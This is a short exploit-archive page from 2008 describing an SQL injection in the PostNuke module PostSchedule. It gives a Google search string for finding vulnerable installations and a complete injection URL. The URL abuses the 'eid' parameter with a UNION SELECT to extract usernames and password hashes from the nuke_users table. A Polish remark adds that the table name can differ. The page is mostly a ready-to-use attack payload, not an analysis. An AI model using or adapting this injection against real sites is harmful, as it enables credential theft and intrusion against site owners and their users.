PostNuke Module PostSchedule (eid) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PostNuke Module PostSchedule (eid) SQL Injection Vulnerability
# Published : 2008-04-25
# Author : Kacper
# Previous Title : PHPKB 1.5 Knowledge Base (ID) SQL Injection Vulnerability
# Next Title : Joomla Component Joomla-Visites 1.1 RC2 RFI Vulnerability

Vuln: Postnuke Mod PostSchedule SQL Vuln
Author: Vuln search Kacper (kacper1964_at_yahoo.pl)
google:"PostSchedule ver 1"

Vuln:

index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

$Severo:
Moga byc rozne tabele np. pn_users, nuke_users itp.

Homepage: http://devilteam.pl/

# www.Syue.com [2008-04-25]